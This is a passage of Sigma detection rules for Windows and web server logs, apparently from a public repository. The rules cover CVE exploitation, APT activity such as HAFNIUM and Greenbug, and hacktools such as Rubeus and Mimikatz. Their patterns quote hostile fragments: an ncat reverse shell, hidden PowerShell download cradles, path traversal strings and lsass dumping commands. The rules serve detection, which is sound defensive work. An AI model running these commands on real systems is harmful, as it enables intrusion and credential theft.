title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1036.005
    - cve.2015-1641
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\MicroScMgmt.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1203
    - attack.t1204.002
    - attack.initial-access
    - attack.t1566.001
    - cve.2017-8759
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1068
    - cve.2019-1388
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        ParentImage|endswith: '\consent.exe'
        Image|endswith: '\iexplore.exe'
        CommandLine|contains: ' http'
    selection_rights:
        - IntegrityLevel:
              - 'System'  # for Sysmon users
              - 'S-1-16-16384' # System
        - User|contains: # covers many language settings
              - 'AUTHORI'
              - 'AUTORI'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical

title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
    Detects FlowCloud malware registry markers from threat group TA410.
    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_event
detection:
    selection:
        TargetObject|contains:
            - '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
            - '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
            - '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
            - '\SYSTEM\Setup\PrintResponsor\'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
    - attack.resource-development
    - attack.t1587
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded: 'C:\Windows\ADFS\version.dll'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: Fortinet CVE-2018-13379 Exploitation
id: a2e97350-4285-43f2-a63f-d0daff291738
status: test
description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
references:
    - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
author: Bhabesh Raj
date: 2020-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2018-13379
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains|all:
            - 'lang=/../../'
            - '/dev/cmdb/sslvpn_websession'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Fortinet CVE-2021-22123 Exploitation
id: f425637f-891c-4191-a6c4-3bb1b70513b4
status: test
description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
references:
    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
author: Bhabesh Raj, Florian Roth
date: 2021-08-19
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-22123
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'
        cs-method: POST
    filter1:
        cs-referer|contains: '/root/user/remote-user/saml-user/'
    filter2:
        cs-referer: null
    condition: selection and not filter1 and not filter2
falsepositives:
    - Unknown
level: critical

title: Goofy Guineapig Backdoor Service Creation
id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
status: test
description: Detects service creation persistence used by the Goofy Guineapig backdoor
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'GoogleUpdate'
        ImagePath|contains|all:
            - 'rundll32'
            - 'FileProtocolHandler'
            - '\ProgramData\GoogleUpdate\GoogleUpdate.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: Grafana Path Traversal Exploitation CVE-2021-43798
id: 7b72b328-5708-414f-9a2a-6a6867c26e16
status: test
description: Detects a successful Grafana path traversal exploitation
references:
    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
    - https://github.com/search?q=CVE-2021-43798
author: Florian Roth (Nextron Systems)
date: 2021-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-43798
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection_traversal:
        cs-uri-query|contains: '/../../../../../../../'
        sc-status: 200
    selection_plugins:
        cs-uri-query|contains:
            - '/public/plugins/live'
            - '/public/plugins/icon'
            - '/public/plugins/loki'
            - '/public/plugins/text'
            - '/public/plugins/logs'
            - '/public/plugins/news'
            - '/public/plugins/stat'
            - '/public/plugins/mssql'
            - '/public/plugins/mixed'
            - '/public/plugins/mysql'
            - '/public/plugins/tempo'
            - '/public/plugins/graph'
            - '/public/plugins/gauge'
            - '/public/plugins/table'
            - '/public/plugins/debug'
            - '/public/plugins/zipkin'
            - '/public/plugins/jaeger'
            - '/public/plugins/geomap'
            - '/public/plugins/canvas'
            - '/public/plugins/grafana'
            - '/public/plugins/welcome'
            - '/public/plugins/xychart'
            - '/public/plugins/heatmap'
            - '/public/plugins/postgres'
            - '/public/plugins/testdata'
            - '/public/plugins/opentsdb'
            - '/public/plugins/influxdb'
            - '/public/plugins/barchart'
            - '/public/plugins/annolist'
            - '/public/plugins/bargauge'
            - '/public/plugins/graphite'
            - '/public/plugins/dashlist'
            - '/public/plugins/piechart'
            - '/public/plugins/dashboard'
            - '/public/plugins/nodeGraph'
            - '/public/plugins/alertlist'
            - '/public/plugins/histogram'
            - '/public/plugins/table-old'
            - '/public/plugins/pluginlist'
            - '/public/plugins/timeseries'
            - '/public/plugins/cloudwatch'
            - '/public/plugins/prometheus'
            - '/public/plugins/stackdriver'
            - '/public/plugins/alertGroups'
            - '/public/plugins/alertmanager'
            - '/public/plugins/elasticsearch'
            - '/public/plugins/gettingstarted'
            - '/public/plugins/state-timeline'
            - '/public/plugins/status-history'
            - '/public/plugins/grafana-clock-panel'
            - '/public/plugins/grafana-simple-json-datasource'
            - '/public/plugins/grafana-azure-monitor-datasource'
    condition: all of selection*
falsepositives:
    - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error
level: critical

title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.g0049
    - attack.execution
    - attack.t1059.001
    - attack.command-and-control
    - attack.t1105
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - ':\ProgramData\adobe\Adobe.exe'
            - ':\ProgramData\oracle\local.exe'
            - '\revshell.exe'
            - '\infopagesbackup\ncat.exe'
            - ':\ProgramData\comms\comms.exe'
    selection_msf:
        CommandLine|contains|all:
            - '-ExecutionPolicy Bypass -File'
            - '\msf.ps1'
    selection_ncat:
        CommandLine|contains|all:
            - 'infopagesbackup'
            - '\ncat'
            - '-e cmd.exe'
    selection_powershell:
        CommandLine|contains:
            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
            - '-nop -w hidden -c $k=new-object'
            - '[Net.CredentialCache]::DefaultCredentials;IEX '
            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
            - '-noninteractive -executionpolicy bypass whoami'
            - '-noninteractive -executionpolicy bypass netstat -a'
    selection_other:
        CommandLine|contains: 'L3NlcnZlcj1'  # base64 encoded '/server='
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\local\temp\'
            - '//b /e:jscript'
            - '.txt'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
    - https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.persistence
    - attack.t1546
    - attack.t1053
    - attack.g0125
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_attrib:
        CommandLine|contains|all:
            - 'attrib'
            - ' +h '
            - ' +s '
            - ' +r '
            - '.aspx'
    selection_vsperfmon:
        - Image|contains: '\ProgramData\VSPerfMon\'
        - CommandLine|contains|all:
              - 'schtasks'
              - 'VSPerfMon'
    selection_opera_1:
        Image|endswith: 'Opera_browser.exe'
        ParentImage|endswith:
            - '\services.exe'
            - '\svchost.exe'
    selection_opera_2:
        Image|endswith: 'Users\Public\opera\Opera_browser.exe'
    selection_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin list shadows'
            - 'Temp\__output'
    selection_makecab_1:
        Image|endswith: '\makecab.exe'
        CommandLine|contains|all:
            - 'inetpub\wwwroot\'
            - '.dmp.zip'
    selection_makecab_2:
        Image|endswith: '\makecab.exe'
        CommandLine|contains:
            - 'Microsoft\Exchange Server\'
            - 'compressionmemory'
            - '.gif'
    selection_7zip:
        CommandLine|contains|all:
            - ' -t7z '
            - 'C:\Programdata\pst'
            - '\it.zip'
    selection_rundll32:
        CommandLine|contains|all:
            - '\comsvcs.dll'
            - 'Minidump'
            - 'full '
            - '\inetpub\wwwroot'
    selection_other:
        CommandLine|contains:
            - 'Windows\Temp\xx.bat'
            - 'Windows\WwanSvcdcs'
            - 'Windows\Temp\cw.exe'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical

title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-uri|contains: 'momyshark\?key='
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - Credential Dumping Tools Named Pipe Created
id: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e
status: test
description: Detects well-known credential dumping tools execution via specific named pipe creation
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
author: Teymur Kheirkhabarov, oscd.community
date: 2019-11-01
modified: 2023-08-07
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.005
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\cachedump'
            - '\lsadump'
            - '\wceservicepipe'
    condition: selection
falsepositives:
    - Legitimate Administrator using tool for password recovery
level: critical

title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' /am51'
            - ' /password'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - DiagTrackEoP Default Named Pipe
id: 1f7025a6-e747-4130-aac4-961eb47015f1
status: test
description: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
references:
    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-03
modified: 2023-08-07
tags:
    - attack.privilege-escalation
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains: 'thisispipe' # Based on source code
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
      type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'dumpert.dmp'
    condition: selection
falsepositives:
    - Very unlikely
level: critical

title: HackTool - Dumpert Process Dumper Execution
id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
status: test
description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
references:
    - https://github.com/outflanknl/Dumpert
    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2025-01-22
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'
        - CommandLine|contains: 'Dumpert.dll'
    condition: selection
falsepositives:
    - Very unlikely
level: critical

title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
    - attack.privilege-escalation
    - attack.t1548.002
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
            - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'rundll32.exe'
            - '.dll'
            - 'StartNodeRelay'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
    - https://github.com/Kevin-Robertson/Inveigh
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Inveigh.exe'
        - OriginalFileName:
              - '\Inveigh.exe'
              - '\Inveigh.dll'
        - Description: 'Inveigh'
        - CommandLine|contains:
              - ' -SpooferIP'
              - ' -ReplyToIPs '
              - ' -ReplyToDomains '
              - ' -ReplyToMACs '
              - ' -SnifferIP'
    condition: selection
falsepositives:
    - Very unlikely
level: critical

title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
    - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
    - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - '\Inveigh-Log.txt'
            - '\Inveigh-Cleartext.txt'
            - '\Inveigh-NTLMv1Users.txt'
            - '\Inveigh-NTLMv2Users.txt'
            - '\Inveigh-NTLMv1.txt'
            - '\Inveigh-NTLMv2.txt'
            - '\Inveigh-FormInput.txt'
            - '\Inveigh.dll'
            - '\Inveigh.exe'
            - '\Inveigh.ps1'
            - '\Inveigh-Relay.ps1'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - Koh Default Named Pipe
id: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a
status: test
description: Detects creation of default named pipes used by the Koh tool
references:
    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-08
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.credential-access
    - attack.stealth
    - attack.t1528
    - attack.t1134.001
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName|contains:
            - '\imposecost'
            - '\imposingcost'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
    - id: 034affe8-6170-11ec-844f-0f78aa0c4d66
      type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
    - https://cobalt.io/blog/kerberoast-attack-techniques
    - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1558
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith:
            - '.kirbi' # Kerberos tickets
            - 'mimilsa.log' # MemSSP default file
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - PurpleSharp Execution
id: ff23ffbc-3378-435e-992f-0624dcf93ab4
status: test
description: Detects the execution of the PurpleSharp adversary simulation tool
references:
    - https://github.com/mvelazc0/PurpleSharp
author: Florian Roth (Nextron Systems)
date: 2021-06-18
modified: 2023-02-05
tags:
    - attack.t1587
    - attack.resource-development
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\purplesharp'
        - OriginalFileName: 'PurpleSharp.exe'
    selection_cli:
        CommandLine|contains:
            - 'xyz123456.exe'
            - 'PurpleSharp'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|contains|all:
            - '\AppData\Local\Temp\SAM-'
            - '.dmp'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: HackTool - Rubeus Execution
id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
related:
    - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18
      type: similar
status: stable
description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
references:
    - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus
    - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
    - https://github.com/GhostPack/Rubeus
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-04-20
tags:
    - attack.credential-access
    - attack.t1003
    - attack.t1558.003
    - attack.lateral-movement
    - attack.t1550.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Rubeus.exe'
        - OriginalFileName: 'Rubeus.exe'
        - Description: 'Rubeus'
        - CommandLine|contains:
              - 'asreproast '
              - 'dump /service:krbtgt '
              - 'dump /luid:0x'
              - 'kerberoast '
              - 'createnetonly /program:'
              - 'ptt /ticket:'
              - '/impersonateuser:'
              - 'renew /ticket:'
              - 'asktgt /user:'
              - 'harvest /interval:'
              - 's4u /user:'
              - 's4u /ticket:'
              - 'hash /password:'
              - 'golden /aes256:'
              - 'silver /user:'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - SafetyKatz Execution
id: b1876533-4ed5-4a83-90f3-b8645840a413
status: test
description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
references:
    - https://github.com/GhostPack/SafetyKatz
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-20
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SafetyKatz.exe'
        - OriginalFileName: 'SafetyKatz.exe'
        - Description: 'SafetyKatz'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - SecurityXploded Execution
id: 7679d464-4f74-45e2-9e01-ac66c5eb041a
status: stable
description: Detects the execution of SecurityXploded Tools
references:
    - https://securityxploded.com/
    - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/
author: Florian Roth (Nextron Systems)
date: 2018-12-19
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1555
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Company: SecurityXploded
        - Image|endswith: 'PasswordDump.exe'
        - OriginalFileName|endswith: 'PasswordDump.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - SharpUp PrivEsc Tool Execution
id: c484e533-ee16-4a93-b6ac-f0ea4868b2f1
status: test
description: Detects the use of SharpUp, a tool for local privilege escalation
references:
    - https://github.com/GhostPack/SharpUp
author: Florian Roth (Nextron Systems)
date: 2022-08-20
modified: 2023-02-13
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.discovery
    - attack.execution
    - attack.stealth
    - attack.t1615
    - attack.t1569.002
    - attack.t1574.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\SharpUp.exe'
        - Description: 'SharpUp'
        - CommandLine|contains:
              - 'HijackablePaths'
              - 'UnquotedServicePath'
              - 'ProcessDLLHijack'
              - 'ModifiableServiceBinaries'
              - 'ModifiableScheduledTask'
              - 'DomainGPPPassword'
              - 'CachedGPPPassword'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: HackTool - SysmonEOP Execution
id: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9
status: test
description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
references:
    - https://github.com/Wh04m1001/SysmonEoP
author: Florian Roth (Nextron Systems)
date: 2022-12-04
modified: 2024-11-23
tags:
    - cve.2022-41120
    - attack.t1068
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\SysmonEOP.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'
            - 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

title: HackTool - Windows Credential Editor (WCE) Execution
id: 7aa7009a-28b9-4344-8c1f-159489a390df
status: test
description: |
